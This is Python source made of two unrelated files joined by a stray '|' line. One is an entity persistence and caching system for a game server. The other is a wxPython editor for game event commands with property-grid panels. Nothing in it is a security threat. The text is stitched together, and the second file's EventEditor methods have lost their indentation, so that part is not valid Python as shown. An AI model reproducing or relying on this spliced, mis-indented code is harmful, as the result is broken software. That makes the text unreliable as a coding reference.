class _EntityMeta(HasFlagsMeta, HasWeaksMeta):
    """Metaclass for Entity: builds per-class blob, instance, and cache maps."""
    def __init__(cls, name, bases, namespace):
        super().__init__(name, bases, namespace)
        # Each Entity subclass gets its own DataBlob subclass to hold its
        # registered attributes and nested blobs.
        cls._base_blob = type(name + "BaseBlob", (DataBlob,), {})
        # Weak values: instances disappear from here once nothing else
        # (including the LRU caches below) holds a strong reference.
        cls._instances = WeakValueDictionary()
        cls._caches = {}
        cls.register_cache("uid")
    def register_blob(cls, name):
        """Decorate a data blob to register it on this entity.
        :param str name: The name of the field to store the blob
        :returns DataBlob: The decorated blob
        :raises AlreadyExists: If the given name already exists as an attr
        :raises TypeError: If the supplied or decorated class is not a
                           subclass of DataBlob
        """
        if hasattr(cls, name):
            raise AlreadyExists(name, getattr(cls, name))
        def _inner(blob_class):
            if (not isinstance(blob_class, type)
                    or not issubclass(blob_class, DataBlob)):
                raise TypeError("must be subclass of DataBlob to register")
            cls._base_blob._blobs[name] = blob_class
            # NOTE(review): the property reads `_blobs[name]` through the
            # *instance's* _base_blob; presumably DataBlob instances expose
            # per-instance blob objects there -- confirm in attributes.py.
            prop = property(lambda s: s._base_blob._blobs[name])
            setattr(cls, name, prop)
            return blob_class
        return _inner
    def register_attr(cls, name):
        """Decorate an attribute to register it on this entity.
        :param str name: The name of the field to store the attribute
        :returns Attribute: The decorated attribute
        :raises AlreadyExists: If the given name already exists as an attr
        :raises TypeError: If the supplied or decorated class is not a
                           subclass of Attribute
        """
        if hasattr(cls, name):
            raise AlreadyExists(name, getattr(cls, name))
        def _inner(attr_class):
            if (not isinstance(attr_class, type)
                    or not issubclass(attr_class, Attribute)):
                raise TypeError("must be subclass of Attribute to register")
            cls._base_blob._attrs[name] = attr_class
            getter = lambda s: s._base_blob._get_attr_val(name)
            # NOTE(review): the conditional binds *inside* the lambda body, so
            # read-only attributes still get a setter -- one that silently
            # no-ops (returns None) instead of there being no setter at all;
            # assignment to a read-only attr will not raise. Confirm intent.
            setter = (lambda s, v: s._base_blob._set_attr_val(name, v)
                      if not attr_class._read_only else None)
            setattr(cls, name, property(getter, setter))
            return attr_class
        return _inner
    @staticmethod
    def _cache_eject_callback(key, entity):
        """A callback for when entities are ejected from a cache.
        When an entity is dumped from all of it's caches, there's a chance
        it could fall out of scope before every being saved, so we save it
        on ejection to be sure.
        :param key: The ejected entity's cache key
        :param Entity entity: The ejected entity
        :return None:
        """
        entity.save()
    def register_cache(cls, key, size=512):
        """Create a new cache for this entity, keyed by attribute.
        Currently these caches are not searched, they merely serve as another
        reference to keep their entries in _instances alive.
        There is support for caching UIDs and Attribute values when
        they change, if you want to register anything else (such as bare
        properties not tied to an Attribute) then you'll need to make sure to
        update the cache yourself when their values change.
        :param str key: The attribute name to use as a key
        :param int size: The size of the cache to create
        :returns None:
        :raises AlreadyExists: If a cache already exists for `key`
        """
        if key in cls._caches:
            # (The historical docstring said KeyError; AlreadyExists is what
            # is actually raised here.)
            raise AlreadyExists(key, cls._caches[key])
        cache = lrucache(size, cls._cache_eject_callback)
        cls._caches[key] = cache
        # Fill the cache with any existing entity data.
        for entity in cls._instances.values():
            attr_value = getattr(entity, key)
            if attr_value not in (None, Unset):
                # Cache values are sets of entities sharing that attr value.
                if attr_value not in cache:
                    cache[attr_value] = {entity}
                else:
                    cache[attr_value].add(entity)
class Entity(HasFlags, HasTags, HasWeaks, metaclass=_EntityMeta):
    """The base of all persistent objects in the game."""
    _store = STORES.register("entities", JSONStore("entities"))
    _uid_code = "E"
    type = "entity"
    # These are overridden in the metaclass, I just put them here
    # to avoid a lot of unresolved reference errors in IDE introspection.
    _base_blob = None
    _instances = {}
    _caches = {}
    __uid_timecode = 0  # Used internally for UID creation.
    def __init__(self, data=None, active=False, savable=True):
        """Create a new entity.
        :param dict data: Optional serialized data to load; a "uid" key, if
                          present, is adopted instead of generating a new UID
        :param bool active: Whether the entity starts "in play"
        :param bool savable: Whether the entity may be written to its store
        """
        super().__init__()
        # The mutable defaults below are deliberate: this inner def is
        # re-executed on every __init__ call, so `blob` and `checked` are
        # fresh each time and accumulate state only across the recursion.
        def _build_base_blob(cls, blob=self._base_blob(self), checked=set()):
            # Recursively update our base blob with the blobs of our parents.
            for base in cls.__bases__:
                _build_base_blob(base)
                # We don't need to do anything with the blob returned by this
                # because we're abusing the mutability of default arguments.
            if issubclass(cls, Entity):
                if cls not in checked:  # pragma: no cover
                    blob._update(cls._base_blob(self))
                    checked.add(cls)
            return blob
        self._base_blob = _build_base_blob(self.__class__)
        self._dirty = False
        self._savable = savable
        # Never, ever manually change an object's UID! There are no checks
        # for removing the old UID from the store, updating UID links, or
        # anything else like that. Bad things will happen!
        self._uid = None
        if data and "uid" in data:
            self._set_uid(data.pop("uid"))
        else:
            self._set_uid(self.make_uid())
        # An active entity is considered "in play", inactive entities are
        # hidden from the game world.
        self.active = active
        if data is not None:
            self.deserialize(data)
    def __repr__(self):
        return joins("Entity<", self.uid, ">", sep="")
    def __hash__(self):
        # Entities hash by UID so they can live in sets and as dict keys.
        if not self.uid:
            raise ValueError("cannot hash entity with no uid")
        return hash(self.uid)
    def __eq__(self, other):
        if not hasattr(other, "uid") or self.uid != other.uid:
            return False
        else:
            return True
    @property
    def uid(self):
        """Return this entity's UID."""
        return self._uid
    def _set_uid(self, uid):
        """Set this entity's UID.
        To ensure cache integrity, this should be the only place that an
        entity's UID is updated. This *only* updates references in the
        internal caches, do not rely on it to change anything in the store
        or any other external references (links from other entities).
        """
        cache = self._caches.get("uid")
        # Drop any stale references held under the previous UID first.
        if self._uid is not None:
            if self._uid in self._instances:
                del self._instances[self._uid]
            if self._uid in cache:
                del cache[self._uid]
        self._uid = uid
        self._instances[uid] = self
        cache[uid] = {self}
    @property
    def is_dirty(self):
        """Return whether this entity is dirty and needs to be saved."""
        return self._dirty
    @property
    def is_savable(self):
        """Return whether this entity can be saved."""
        return self._store and self._savable
    def _flags_changed(self):
        self.dirty()
    def _tags_changed(self):
        self.dirty()
    def dirty(self):
        """Mark this entity as dirty so that it will be saved."""
        self._dirty = True
    def serialize(self):
        """Create a sanitized dict from the data on this entity.
        :returns dict: The serialized data
        """
        data = self._base_blob.serialize()
        data["type"] = class_name(self)
        data["uid"] = self._uid
        data["flags"] = self.flags.as_tuple
        # Deep-copied so later tag mutations don't leak into the snapshot.
        data["tags"] = deepcopy(self.tags.as_dict)
        return data
    def deserialize(self, data):
        """Update this entity's data using values from a dict.
        :param dict data: The data to deserialize
        :returns None:
        """
        if "type" in data:
            del data["type"]
        if "uid" in data:
            self._set_uid(data.pop("uid"))
        if "flags" in data:
            self.flags.add(*data.pop("flags"))
        if "tags" in data:
            self.tags.clear()
            self.tags.update(data.pop("tags"))
        # Whatever remains belongs to the attribute blob.
        self._base_blob.deserialize(data)
    @classmethod
    def reconstruct(cls, data):
        """Reconstruct an entity from a dict of its data.
        The given `data` must include a "type" key with the name of a
        registered Entity class as its value.
        This differs from the deserialize method in that this method will
        return an entity created from a class specified in the data, rather
        than merging the data into an existing instance of a (potentially
        different) class.
        :param dict data: The data to reconstruct the entity from
        :returns Entity: The reconstructed entity instance
        :raises KeyError: If `data` has no "type" key or the value of the
                          given key is not a registered Entity class
        """
        entity_name = data.pop("type", None)
        if not entity_name or entity_name not in ENTITIES:
            raise KeyError("failed to reconstruct entity: bad class key")
        entity = ENTITIES[entity_name](data)
        log.debug("Reconstructed %s (%s).", entity, entity.uid)
        return entity
    @classmethod
    def make_uid(cls):
        """Create a UID for this entity.
        UIDs are in the form "C-TTTTTTTT", where C is the entity code and T
        is the current time code. (Ex. "E-6jQZ4zvH")
        :returns str: The new UID
        """
        big_time = TIMERS.time * _uid_timecode_multiplier
        # Monotonic bump: if the clock hasn't advanced past the last issued
        # code, increment instead so UIDs never repeat within a process.
        if big_time > Entity.__uid_timecode:
            Entity.__uid_timecode = big_time
        else:
            Entity.__uid_timecode += 1
        timecode_string = int_to_base_n(Entity.__uid_timecode,
                                        _uid_timecode_charset)
        uid = "-".join((cls._uid_code, timecode_string))
        return uid
    @classmethod
    def _find_in_cache(cls, ignore_keys=(), **attr_value_pairs):
        # Linear scan over live instances; despite the name, this checks
        # _instances rather than the LRU caches (which are not searched).
        found = set()
        for key, entity in cls._instances.items():
            if key in ignore_keys:
                continue
            for attr, value in attr_value_pairs.items():
                if getattr(entity, attr) != value:
                    break
            else:
                # for/else: only reached when every pair matched.
                found.add(entity)
        return found
    @classmethod
    def find(cls, cache=True, store=True, subclasses=True,
             ignore_keys=(), **attr_value_pairs):
        """Find one or more entities by one of their attribute values.
        :param bool cache: Whether to check the _instances cache
        :param bool store: Whether to check the store
        :param bool subclasses: Whether to check subclasses as well
        :param iterable ignore_keys: A sequence of keys to ignore
        :param iterable attr_value_pairs: Pairs of attributes and values to
                                          match against
        :returns list: A list of found entities, if any
        :raises SyntaxError: If both `cache` and `store` are False
        """
        if not cache and not store:
            raise SyntaxError("can't find without cache or store")
        found = set()
        # We might be recursing from a parent class, so if they passed
        # us an existing set we want to use the same one.
        if ignore_keys == ():
            ignore_keys = set()
        elif not isinstance(ignore_keys, set):
            ignore_keys = set(ignore_keys)
        if cache:
            found.update(cls._find_in_cache(ignore_keys=ignore_keys,
                                            **attr_value_pairs))
            # Anything already seen in memory is skipped by deeper passes;
            # this mutation is shared with recursive subclass calls.
            ignore_keys.update(cls._instances.keys())
            if subclasses:
                for subclass in cls.__subclasses__():
                    found.update(subclass.find(store=False,
                                               ignore_keys=ignore_keys,
                                               **attr_value_pairs))
        if store:
            found_uids = cls._store.find(ignore_keys=ignore_keys,
                                         **attr_value_pairs)
            found.update([cls.reconstruct(cls._store.get(uid))
                          for uid in found_uids])
            ignore_keys.update(cls._store.keys())
            if subclasses:
                for subclass in cls.__subclasses__():
                    found.update(subclass.find(cache=False,
                                               ignore_keys=ignore_keys,
                                               **attr_value_pairs))
        return list(found)
    @classmethod
    def find_relations(cls, **attr_value_pairs):
        """Find one or more entities by a relation to another entity.
        The purpose of this versus `find` is to match related entities by
        direct reference (in the cache) or by UID (in the store) in one call.
        :param iterable attr_value_pairs: Pairs of attributes and values to
                                          match against
        :returns list: A list of found entities, if any
        :raises TypeError: If any of the pairs' values are not entity instances
        """
        found = set(cls.find(store=False, **attr_value_pairs))
        found_keys = set(entity.uid for entity in found)
        # Swap each entity value for its UID before querying the store
        # (in-place key reassignment; the dict's size does not change).
        for key, value in attr_value_pairs.items():
            if not isinstance(value, Entity):
                raise TypeError(joins("relation value is not entity:", value))
            attr_value_pairs[key] = value.uid
        found.update(cls.find(cache=False, ignore_keys=found_keys,
                              **attr_value_pairs))
        return list(found)
    @classmethod
    def get(cls, key=None, default=None, cache=True, store=True,
            subclasses=True, **attr_value_pairs):
        """Get an entity by one or more of their attribute values.
        :param key: The key to get; if given `attr_value_pairs` will be ignored
        :param default: A default value to return if no entity is found; if
                        default is an exception, it will be raised instead
        :param bool cache: Whether to check the caches
        :param bool store: Whether to check the store
        :param bool subclasses: Whether to check subclasses as well
        :param iterable attr_value_pairs: Pairs of attributes and values to
                                          match against
        :returns Entity: A matching entity, or default
        :raises KeyError: If more than one entity matches the given values
        """
        if key is None:
            matches = cls.find(cache=cache, store=store,
                               subclasses=subclasses,
                               **attr_value_pairs)
            if len(matches) > 1:
                raise KeyError(joins("get returned more than one match:",
                                     matches, "using attrs", attr_value_pairs))
            if matches:
                return matches[0]
        else:
            if cache:
                if key in cls._instances:
                    return cls._instances[key]
                if subclasses:
                    for subclass in cls.__subclasses__():
                        found = subclass.get(key, cache=cache, store=store)
                        if found:
                            return found
            if store:
                if cls._store.has(key):
                    return cls.reconstruct(cls._store.get(key))
        # Nothing was found.
        # Note: only exception *classes* are raised; an exception instance
        # passed as default is returned like any other value.
        if isinstance(default, type) and issubclass(default, Exception):
            raise default
        else:
            return default
    @classmethod
    def all(cls):
        """Return all active instances of this entity.
        :returns list: All active instances of this entity type
        """
        return [instance for instance in cls._instances.values()
                if instance.active]
    def save(self):
        """Store this entity."""
        if not self.is_savable:
            log.warning("Tried to save non-savable entity %s!", self)
            return
        if "_old_key" in self.tags:
            # The entity's key has changed, so we need to handle that.
            old_key = self.tags["_old_key"]
            if self._store.has(old_key):
                self._store.delete(old_key)
            del self.tags["_old_key"]
        data = self.serialize()
        self._store.put(self.uid, data)
        self._dirty = False
    def revert(self):
        """Revert this entity to a previously saved state."""
        if not self._store:
            raise TypeError("cannot revert entity with no store")
        data = self._store.get(self.uid)
        if self.uid != data["uid"]:
            raise ValueError(joins("uid mismatch trying to revert", self))
        self.deserialize(data)
        self._dirty = False
    def clone(self):
        """Create a new entity with a copy of this entity's data.
        :returns Entity: The new, cloned entity
        """
        entity_class = type(self)
        data = self.serialize()
        # Drop the UID so the clone is assigned a fresh one in __init__.
        del data["uid"]
        new_entity = entity_class(data)
        return new_entity
    def delete(self):
        """Delete this entity from the caches and its store."""
        for attr, cache in self._caches.items():
            attr_value = getattr(self, attr)
            if attr_value in cache:
                del cache[attr_value]
        if self._store and self._store.has(self.uid):
            self._store.delete(self.uid)
        if self.uid in self._instances:
            del self._instances[self.uid]
# We create a global EntityManager here for convenience, and while the
# server will generally only need one to work with, they are NOT singletons
# and you can make more EntityManager instances if you like.
ENTITIES = EntityManager()
@Entity.register_attr("version")
class EntityVersion(Attribute):
    """An entity's version."""
    default = 1
    @classmethod
    def validate(cls, entity, new_value):
        """Accept only integer versions, returning the value unchanged."""
        if isinstance(new_value, int):
            return new_value
        raise TypeError("entity version must be a number")
|
from dataclasses import dataclass
from typing import List
from gui import generated
from formats.event import Event
from formats.gds import GDSCommand
import wx
import wx.propgrid
from gui.PygamePreviewer import PygamePreviewer
from previewers.event.EventPlayer import EventPlayer
class ButtonNoTab(wx.Button):
    """A wx.Button that is skipped during keyboard (Tab) focus traversal."""
    def AcceptsFocusFromKeyboard(self):
        # wx hook: returning False removes this button from the tab order;
        # it remains clickable with the mouse.
        return False
@dataclass
class CommandRepr:
    """Editable representation of one GDS command: its name plus a
    [label, type-name, value] triple for every parameter."""
    command_name: str
    params: List[List]
    @staticmethod
    def from_gds(gds_command: GDSCommand, event: Event):
        """Build a CommandRepr from a raw GDSCommand via the event's converter."""
        name, values, labels = event.convert_command(gds_command, for_code=False)
        last = len(values) - 1
        triples = []
        for i, (label, value) in enumerate(zip(labels, values)):
            type_name = type(value).__name__
            # Ints are edited as unsigned, except for Fade commands and each
            # command's final int parameter.
            if type_name == "int" and name != "Fade" and i != last:
                type_name = "uint"
            # Dialogue text uses the multi-line string editor.
            if name == "Dialogue":
                type_name = "long_str"
            triples.append([label, type_name, value])
        return CommandRepr(name, triples)
    def to_gds(self, event: Event):
        """Convert back into a GDS command using only the edited values."""
        return event.revert_command(self.command_name, [p[2] for p in self.params])
class CommandPanel(wx.Panel):
    """One editable command row: name label, move/delete buttons, and a
    property grid with an editor per command parameter."""
    def __init__(self, command_repr: CommandRepr, *args, **kwargs):
        super(CommandPanel, self).__init__(*args, **kwargs)
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer2 = wx.BoxSizer(wx.HORIZONTAL)
        self.command_repr = command_repr
        self.command_name_label = wx.StaticText(self, wx.ID_ANY, command_repr.command_name, wx.DefaultPosition,
                                                wx.DefaultSize, wx.ALIGN_CENTER_HORIZONTAL)
        self.command_name_label.SetSize((112, -1))
        self.command_name_label.Wrap(-1)
        self.move_up_btn = ButtonNoTab(self, wx.ID_ANY, "Move Up", wx.DefaultPosition, wx.DefaultSize, 0)
        self.move_up_btn.SetSize((112, -1))
        self.move_down_btn = ButtonNoTab(self, wx.ID_ANY, "Move Down", wx.DefaultPosition, wx.DefaultSize, 0)
        self.move_down_btn.SetSize((112, -1))
        self.delete_btn = ButtonNoTab(self, wx.ID_ANY, "Delete", wx.DefaultPosition, wx.DefaultSize, 0)
        self.delete_btn.SetSize((112, -1))
        # Static layout/splitter flags keep the grid fixed; rows are added
        # once below and never reflowed.
        self.property_grid = wx.propgrid.PropertyGrid(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,
                                                      wx.propgrid.PG_DEFAULT_STYLE | wx.propgrid.PG_HIDE_MARGIN |
                                                      wx.propgrid.PG_SPLITTER_AUTO_CENTER |
                                                      wx.propgrid.PG_STATIC_LAYOUT | wx.propgrid.PG_STATIC_SPLITTER |
                                                      wx.TAB_TRAVERSAL)
        self.property_grid.SetMaxSize((470, self.property_grid.GetRowHeight() * len(command_repr.params) + 4))
        self.property_grid.Bind(wx.EVT_MOUSEWHEEL, self.scroll_pg)
        self.properties: List[wx.propgrid.PGProperty] = []
        # One PGProperty per parameter, chosen by the type tag produced in
        # CommandRepr.from_gds ("uint"/"int"/"float"/"str"/"long_str"/"bool").
        for param in command_repr.params:
            p_label, p_type, p_value = param
            if p_type == "uint":
                property_ = self.property_grid.Append(wx.propgrid.UIntProperty(p_label, p_label, p_value))
            elif p_type == "int":
                property_ = self.property_grid.Append(wx.propgrid.IntProperty(p_label, p_label, p_value))
            elif p_type == "float":
                property_ = self.property_grid.Append(wx.propgrid.FloatProperty(p_label, p_label, p_value))
            elif p_type == "str":
                property_ = self.property_grid.Append(wx.propgrid.StringProperty(p_label, p_label, p_value))
            elif p_type == "long_str":
                property_ = self.property_grid.Append(wx.propgrid.LongStringProperty(p_label, p_label, p_value))
            elif p_type == "bool":
                property_ = self.property_grid.Append(wx.propgrid.BoolProperty(p_label, p_label, p_value))
            elif p_value is None:
                # None values are coerced to int with a -1 sentinel; this
                # mutates the shared CommandRepr entry on purpose.
                param[1] = "int"
                property_ = self.property_grid.Append(wx.propgrid.IntProperty(p_label, p_label, -1))
            else:
                # NOTE(review): skipped params get no PGProperty, which would
                # shift the index alignment assumed by get_command_repr --
                # confirm unknown type tags can never reach this point.
                continue
            property_: wx.propgrid.PGProperty
            self.properties.append(property_)
        sizer2.Add(self.command_name_label, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
        self.command_name_label.Layout()
        sizer2.Add(self.move_up_btn, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
        self.move_up_btn.Layout()
        sizer2.Add(self.move_down_btn, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
        self.move_down_btn.Layout()
        sizer2.Add(self.delete_btn, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
        self.delete_btn.Layout()
        sizer.Add(sizer2, 0, wx.ALL | wx.EXPAND, 5)
        sizer.Add(self.property_grid, 0, wx.ALL | wx.EXPAND, 5)
        self.property_grid.Layout()
        self.SetSizer(sizer)
        self.Layout()
        sizer.Fit(self)
        self.move_up_btn.Bind(wx.EVT_BUTTON, self.move_up)
        self.move_down_btn.Bind(wx.EVT_BUTTON, self.move_down)
        self.delete_btn.Bind(wx.EVT_BUTTON, self.delete)
        # Let Up/Down arrows move between grid rows instead of leaving it.
        self.property_grid.AddActionTrigger(wx.propgrid.PG_ACTION_NEXT_PROPERTY, wx.WXK_DOWN)
        self.property_grid.AddActionTrigger(wx.propgrid.PG_ACTION_PREV_PROPERTY, wx.WXK_UP)
        self.property_grid.DedicateKey(wx.WXK_DOWN)
        self.property_grid.DedicateKey(wx.WXK_UP)
    def get_command_repr(self) -> CommandRepr:
        """Copy the grid's current values back into self.command_repr."""
        for i, property_ in enumerate(self.properties):
            if self.command_repr.params[i][1] == "long_str":
                # NOTE(review): unescapes literal "\n" before "\\" -- an input
                # containing backslash-backslash-n therefore decodes to
                # backslash+newline; confirm that ordering is intended.
                self.command_repr.params[i][2] = property_.GetValue().replace(r"\n", "\n").replace(r"\\", "\\")
                continue
            self.command_repr.params[i][2] = property_.GetValue()
        return self.command_repr
    def move_up(self, _):
        # Reordering/removal is owned by the grandparent editor panel.
        self.GetGrandParent().move_up(self)
    def move_down(self, _):
        self.GetGrandParent().move_down(self)
    def delete(self, _):
        self.GetGrandParent().delete(self)
    def scroll_pg(self, event):
        """Forward mouse-wheel events to the parent so the page scrolls
        instead of the fixed-size property grid."""
        parent: wx.EvtHandler = self.GetParent().GetEventHandler()
        parent.ProcessEvent(event)
        event.Skip()
class EventEditor(generated.EventEditor):
def __init__(self, *args, **kwargs):
super(EventEditor, self).__init__(*args, **kwargs)
self.menu = wx.Menu()
self.event: [Event] = None
self.previewer: PygamePreviewer = PygamePreviewer.INSTANCE
self.command_panels: List[CommandPanel] = []
main_editor = self.GetGrandParent()
def add_menu_item(menu, title, handler):
ase_menu_item = wx.MenuItem(menu, wx.ID_ANY, title)
menu.Append(ase_menu_item)
main_editor.Bind(wx.EVT_MENU, handler, id=ase_menu_item.GetId())
add_menu_item(self.menu, "Apply", self.apply_changes)
add_menu_item(self.menu, "Save", self.save_changes)
def add_command_panel(self, command_repr: CommandRepr):
sizer: wx.Sizer = self.event_commands.GetSizer()
command_panel = CommandPanel(command_repr, self.event_commands, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,
wx.TAB_TRAVERSAL)
sizer.Add(command_panel, 0, wx.ALL | wx.EXPAND, 5)
command_panel.Layout()
self.event_commands.Layout()
sizer.Layout()
self.Layout()
def set_event_info(self):
self.m_mapTopID.SetValue(self.event.map_top_id)
self.m_mapBtmID.SetValue(self.event.map_bottom_id)
self.char_id0.SetValue(self.event.characters[0])
self.char_id1.SetValue(self.event.characters[1])
self.char_id2.SetValue(self.event.characters[2])
self.char_id3.SetValue(self.event.characters[3])
self.char_id4.SetValue(self.event.characters[4])
self.char_id5.SetValue(self.event.characters[5])
self.char_id6.SetValue(self.event.characters[6])
self.char_id7.SetValue(self.event.characters[7])
self.char_slot0.SetValue(self.event.characters_pos[0])
self.char_slot1.SetValue(self.event.characters_pos[1])
self.char_slot2.SetValue(self.event.characters_pos[2])
self.char_slot3.SetValue(self.event.characters_pos[3])
self.char_slot4.SetValue(self.event.characters_pos[4])
self.char_slot5.SetValue(self.event.characters_pos[5])
self.char_slot6.SetValue(self.event.characters_pos[6])
self.char_slot7.SetValue(self.event.characters_pos[7])
self.char_visible0.SetValue(self.event.characters_shown[0])
self.char_visible1.SetValue(self.event.characters_shown[1])
self.char_visible2.SetValue(self.event.characters_shown[2])
self.char_visible3.SetValue(self.event.characters_shown[3])
self.char_visible4.SetValue(self.event.characters_shown[4])
self.char_visible5.SetValue(self.event.characters_shown[5])
self.char_visible6.SetValue(self.event.characters_shown[6])
self.char_visible7.SetValue(self.event.characters_shown[7])
self.char_anim0.SetValue(self.event.characters_anim_index[0])
self.char_anim1.SetValue(self.event.characters_anim_index[1])
self.char_anim2.SetValue(self.event.characters_anim_index[2])
self.char_anim3.SetValue(self.event.characters_anim_index[3])
self.char_anim4.SetValue(self.event.characters_anim_index[4])
self.char_anim5.SetValue(self.event.characters_anim_index[5])
self.char_anim6.SetValue(self.event.characters_anim_index[6])
self.char_anim7.SetValue(self.event.characters_anim_index[7])
def get_event_info(self):
    """Read the editor widgets back into the current event.

    Inverse of set_event_info: each of the 8 numbered widget groups is
    written back to the corresponding event list entry.
    """
    self.event.map_top_id = self.m_mapTopID.GetValue()
    self.event.map_bottom_id = self.m_mapBtmID.GetValue()
    # Pull the 8 character slots from their numbered widget groups instead
    # of repeating one hard-coded line per widget (was 32 copy-pasted lines).
    for i in range(8):
        self.event.characters[i] = getattr(self, "char_id%d" % i).GetValue()
        self.event.characters_pos[i] = getattr(self, "char_slot%d" % i).GetValue()
        self.event.characters_shown[i] = getattr(self, "char_visible%d" % i).GetValue()
        self.event.characters_anim_index[i] = getattr(self, "char_anim%d" % i).GetValue()
def load_event(self, event: Event):
    """Make *event* the edited event and rebuild the command panel list."""
    self.event = event
    self.set_event_info()
    self.command_panels.clear()
    sizer: wx.Sizer = self.event_commands.GetSizer()
    sizer.Clear(True)  # True: also destroy the old panel windows
    # The enumerate() index was unused; iterate the commands directly.
    for command in self.event.event_gds.commands:
        self.add_command_panel(CommandRepr.from_gds(command, self.event))
    self.event_commands.Layout()
    self.Layout()
def apply_changes(self, _):
    """Rebuild the event's GDS command list from the UI panels and restart the preview."""
    self.get_event_info()
    self.event.clear_event_texts()
    sizer: wx.Sizer = self.event_commands.GetSizer()
    panels = [item.GetWindow() for item in sizer.GetChildren()]
    commands = self.event.event_gds.commands
    commands.clear()
    for panel in panels:
        panel: CommandPanel
        commands.append(panel.get_command_repr().to_gds(self.event))
    self.previewer.start_renderer(EventPlayer(self.event))
def save_changes(self, _event):
    """Apply any pending UI edits, then persist the event back to the ROM."""
    self.apply_changes(None)
    self.event.save_to_rom()
def move_up(self, command_panel: CommandPanel):
    """Move *command_panel* one position towards the top of the command list."""
    sizer: wx.Sizer = self.event_commands.GetSizer()
    for index, item in enumerate(sizer.GetChildren()):
        item: wx.SizerItem
        if item.GetWindow() != command_panel:
            continue
        sizer.Detach(command_panel)
        # Clamp at 0 so the first panel stays first.
        sizer.Insert(max(0, index - 1), command_panel, 0, wx.ALL | wx.EXPAND, 5)
        break
    command_panel.Layout()
    for item in sizer.GetChildren():
        item.GetWindow().Layout()
    self.event_commands.Layout()
    sizer.Layout()
def move_down(self, command_panel):
    """Move *command_panel* one position towards the bottom of the command list."""
    sizer: wx.Sizer = self.event_commands.GetSizer()
    for index, item in enumerate(sizer.GetChildren()):
        item: wx.SizerItem
        if item.GetWindow() != command_panel:
            continue
        sizer.Detach(command_panel)
        # After Detach the child list is one shorter, so index + 1 may equal
        # the child count; min() clamps so the last panel stays last.
        sizer.Insert(min(len(sizer.GetChildren()), index + 1), command_panel, 0, wx.ALL | wx.EXPAND, 5)
        break
    command_panel.Layout()
    for item in sizer.GetChildren():
        item.GetWindow().Layout()
    self.event_commands.Layout()
    sizer.Layout()
def delete(self, command_panel):
    """Remove *command_panel* from the command list and destroy its window."""
    sizer: wx.Sizer = self.event_commands.GetSizer()
    for index, item in enumerate(sizer.GetChildren()):
        item: wx.SizerItem
        if item.GetWindow() != command_panel:
            continue
        sizer.Remove(index)
        command_panel.Destroy()
        break
    try:
        command_panel.Layout()
    except RuntimeError:
        # wrapped C/C++ object of type CommandPanel has been deleted
        pass
    self.event_commands.Layout()
    sizer.Layout()
def enter(self):
    """Called when this editor page becomes active: install the Event menu."""
    frame = self.GetGrandParent()
    frame.add_menu(self.menu, "Event")
def exit(self):
    """Called when this editor page is left: remove the Event menu."""
    frame = self.GetGrandParent()
    frame.remove_menu("Event")
def add_dialogue(self, _):
    """Menu handler: append a Dialogue command panel with default parameters."""
    command = CommandRepr(
        "Dialogue",
        [
            ["Text GDS Number", "uint", 0],
            ["Character ID", "uint", 0],
            ["Start Animation", "str", "NONE"],
            ["End Animation", "str", "NONE"],
            ["Sound Pitch?", "uint", 2],
            ["Text", "long_str", ""],
        ],
    )
    self.add_command_panel(command)
def add_fade(self, _):
    """Menu handler: append a fade command panel with default parameters."""
    command = CommandRepr(
        self.event.func_names["fade"],
        [
            ["Fade In", "bool", False],
            ["Fade Screen", "uint", 0],
            ["Fade Frames", "int", -1],
        ],
    )
    self.add_command_panel(command)
def add_bg_load(self, _):
    """Menu handler: append a background-load command panel."""
    command = CommandRepr(
        self.event.func_names["bg_load"],
        [
            ["Path", "str", ""],
            ["Screen", "uint", 0],
        ],
    )
    self.add_command_panel(command)
def add_set_mode(self, _):
    """Menu handler: append a set-mode command panel."""
    command = CommandRepr(
        self.event.func_names["set_mode"],
        [["Mode", "str", ""]],
    )
    self.add_command_panel(command)
def add_set_next_mode(self, _):
    """Menu handler: append a set-next-mode command panel."""
    command = CommandRepr(
        self.event.func_names["set_next_mode"],
        [["Mode", "str", ""]],
    )
    self.add_command_panel(command)
def add_set_movie(self, _):
    """Menu handler: append a set-movie command panel."""
    command = CommandRepr(
        self.event.func_names["set_movie"],
        [["Movie ID", "uint", 0]],
    )
    self.add_command_panel(command)
def add_set_event(self, _):
    """Menu handler: append a set-event command panel."""
    command = CommandRepr(
        self.event.func_names["set_event"],
        [["Event ID", "uint", 0]],
    )
    self.add_command_panel(command)
def add_set_puzzle(self, _):
    """Menu handler: append a set-puzzle command panel."""
    command = CommandRepr(
        self.event.func_names["set_puzzle"],
        [["Puzzle ID", "uint", 0]],
    )
    self.add_command_panel(command)
def add_set_room(self, _):
    """Menu handler: append a set-room command panel."""
    command = CommandRepr(
        self.event.func_names["set_room"],
        [["Room ID", "uint", 0]],
    )
    self.add_command_panel(command)
def add_chr_show(self, _):
    """Menu handler: append a character-show command panel."""
    command = CommandRepr(
        self.event.func_names["chr_show"],
        [["Character Index", "uint", 0]],
    )
    self.add_command_panel(command)
def add_chr_hide(self, _):
    """Menu handler: append a character-hide command panel."""
    command = CommandRepr(
        self.event.func_names["chr_hide"],
        [["Character Index", "uint", 0]],
    )
    self.add_command_panel(command)
def add_chr_visibility(self, _):
    """Menu handler: append a character-visibility command panel."""
    command = CommandRepr(
        self.event.func_names["chr_visibility"],
        [
            ["Character Index", "uint", 0],
            ["Visibility", "bool", False],
        ],
    )
    self.add_command_panel(command)
def add_chr_slot(self, _):
    """Menu handler: append a character-slot command panel."""
    command = CommandRepr(
        self.event.func_names["chr_slot"],
        [
            ["Character Index", "uint", 0],
            ["Slot", "int", 0],
        ],
    )
    self.add_command_panel(command)
def add_chr_anim(self, _):
    """Menu handler: append a character-animation command panel."""
    command = CommandRepr(
        self.event.func_names["chr_anim"],
        [
            ["Character ID", "uint", 0],
            ["Animation", "str", "NONE"],
        ],
    )
    self.add_command_panel(command)
def add_show_chapter(self, _):
    """Menu handler: append a show-chapter command panel."""
    command = CommandRepr(
        self.event.func_names["show_chapter"],
        [["Chapter Number", "uint", 0]],
    )
    self.add_command_panel(command)
def add_wait(self, _):
    """Menu handler: append a wait command panel (default 180 frames)."""
    command = CommandRepr(
        self.event.func_names["wait"],
        [["Wait Frames", "uint", 180]],
    )
    self.add_command_panel(command)
